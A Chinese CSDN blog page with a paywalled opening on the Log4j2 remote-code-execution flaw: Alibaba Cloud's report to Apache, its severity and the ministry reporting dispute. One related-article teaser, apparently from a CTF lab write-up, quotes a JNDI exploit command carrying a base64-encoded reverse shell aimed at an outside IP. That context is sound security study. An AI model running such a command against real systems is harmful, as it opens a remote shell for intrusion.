深入解析著名的阿里云Log4j 漏洞

最新推荐文章于 2024-03-21 10:25:06 发布
最新推荐文章于 2024-03-21 10:25:06 发布
阅读量3.3k 收藏 9
点赞数 3
分类专栏: 全栈网络安全 渗透测试 代码审计 网络安全工具开发 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35029061/article/details/125960217
版权

几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。

Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。

一、事件起因

Log4j 漏洞最早由阿里云安全团队报告,其员工 Chen Zhaojun 于 11 月 24 日向 Apache 组织发送了一封邮件,在邮件中他写道,“我想报告一个安全漏洞,这个漏洞将会带来很大的影响”。该邮件详述了黑客可能会如何利用 Log4j 这一广泛使用的软件工具,实现所谓的远程代码控制,这是黑客的梦想,因为他们可以远程接管一台计算机。

Apache平台开始预警与测试修复,于12月初完成修补,随后阿里云在12月9日正式发布网络安全通报,并公布细节。这个漏洞的风险层级达到了CVSS满分10分,可能是近年最严重的安全漏洞之一。

不过工信部12月11号才知道有这事,作为近十年最大的系统漏洞,有报道称在漏洞修复前,国内七成的网站处于裸奔状态,等知道的时候,黄花菜已经凉了...

工信部依据2021年9月1号开始执行的《网络产品安全漏洞管理规定》第七条第二节“网络产品提供者应当履行下列网络产品安全漏洞管理义务,确保其产品安全漏洞得到及时修补和合理发布,并指导支持产品用户采取防范措施:...(二)应当在2日内向工业和信息化部网络安全威胁和漏洞信息共享平台报送相关漏洞信息。报送内容应当包括存在网络产品安全漏洞的产品名称、型号、版本以及漏洞的技术特点、危害和

了解本专栏 订阅专栏 解锁全文 超级会员免费看
wespten
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
ArcGIS漏洞修补工具(Log4J)
01-18
ArcGIS Enterprise 10.9.1及以下版本的 log4j 漏洞修补工具
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
12-16
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
漏洞复现】2.Apache Log4j2远程代码执行漏洞(CVE-2021-44228)复现及分析
最新发布
Zichel77的博客
03-21 1146
Apache 是当今世界上非常流行的跨平台Web服务端,有着良好的扩充性。而Log4j则是Apache的开源组件,用于日志管理,功能强大。Log4j来源于 Apache 软件基金会的日志服务项目,是一种Java日志框架,从最初Log4j1发展到现在的Log4j2,已经广泛应用于各行各业的业务开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞
log4j漏洞修复升级jar包(log4j-api-2.17.0.jar)
03-09
log4j漏洞修复升级jar包(log4j-api-2.17.0.jar)
log4j漏洞修复升级jar包(log4j-1.2-api-2.17.0.jar)
03-09
log4j漏洞修复升级jar包(log4j-1.2-api-2.17.0.jar)
log4j漏洞本地排查小工具.zip
12-29
log4j漏洞本地排查小工具,扫描你的项目存不存在log4j漏洞
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
log4j漏洞详解
weixin_61638307的博客
03-21 3705
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。
log4j漏洞原理和靶场复现
Aiwin的博客
08-19 7445
log4j漏洞原理和靶场复现
log4j漏洞分析及总结
热门推荐
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
JAVA安全--log4j漏洞研究分析
goddemon
03-12 9398
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
log4j2.17.2
04-14
log4j 全套jar包 用于修复漏洞和替换升级log4j 全套jar包 用于修复漏洞和替换升级log4j 全套jar包 用于修复漏洞和替换升级log4j 全套jar包 用于修复漏洞和替换升级
Log4j2原理、攻击和解决方案来聊聊这次全球性的Log4j2漏洞
ixxqq的博客
12-16 409
本文分四个方面来说说Log4j2的相关问题1、Log4j2原理2、如何利用漏洞进行攻击3、解决方案4、带来的思考。此次漏洞影响面之广足以载入安全史册,Log4j2凭借一己之力让全球程序员过...
漏洞预警】Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)
明哥哥知识分享
12-13 1624
2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。2021年12月10日,阿里云安全团队发现 Apache Log4j 2.15.0-rc1 版本存在漏洞绕过,请及时更新至 Apache Log4j 2.15.0-rc2 版本。 漏洞描述 Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能
阿里云被工信部暂停合作!Log4j 持续爆雷,啥时候是个头?
民工哥的博客
12-23 1885
点击关注公众号,回复“1024”获取2TB学习资源!作者 | 褚杏娟 核子可乐来源:infoQ据媒体报道,近期工信部网络安全管理局通报称,阿里云计算有限公司(以下称:阿里云)在 11 月...
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2234
log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞
【渗透测试】log4j漏洞复现和漏洞修复方案
Yb528970805的博客
09-16 1849
2021年12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
深入分析Log4j 漏洞
嘉禾笔记
12-16 1万+
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。 Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。 2021.12.7,Log4j首次被发现了一个非常严重的漏洞,在当天Log4j就发布了log4j-2.15.0-rc1,但是12.
log4j漏洞检测工具
08-18
log4j漏洞是指Apache软件基金会下的一个Java日志库log4j在其版本2.0.16之前的版本中存在的一个安全漏洞。该漏洞允许攻击者通过精心构造的日志消息触发远程代码执行,从而导致严重的安全威胁,被广泛用于攻击各种应用程序。 为了帮助用户及时发现并修复这个漏洞,一些安全公司和开发者团队推出了log4j漏洞检测工具。这些工具通过扫描和分析应用程序的代码、依赖库和配置文件,检测其中是否使用了受影响的log4j版本。如果发现了存在漏洞的情况,工具会立即发出警报,提醒用户采取相应的修复措施。 log4j漏洞检测工具通常具有以下功能: 1. 版本检测:工具能够检测应用程序使用的log4j版本,并判断其是否受到漏洞影响。如果使用了漏洞版本,工具会发出警报。 2. 自动扫描:工具能够自动扫描应用程序的源代码、依赖库和配置文件,以快速发现潜在的漏洞问题。 3. 实时警报:一旦发现存在漏洞的情况,工具会立即发出实时警报,帮助用户及时采取措施减少风险。 4. 修复建议:工具通常会提供关于如何修复漏洞的建议和指导,帮助用户确保应用程序的安全性。 总之,log4j漏洞检测工具是帮助用户及时发现和修复log4j漏洞的辅助工具。使用这些工具可以大大减少应用程序受到漏洞攻击的风险,保障系统的安全和稳定运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wespten

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值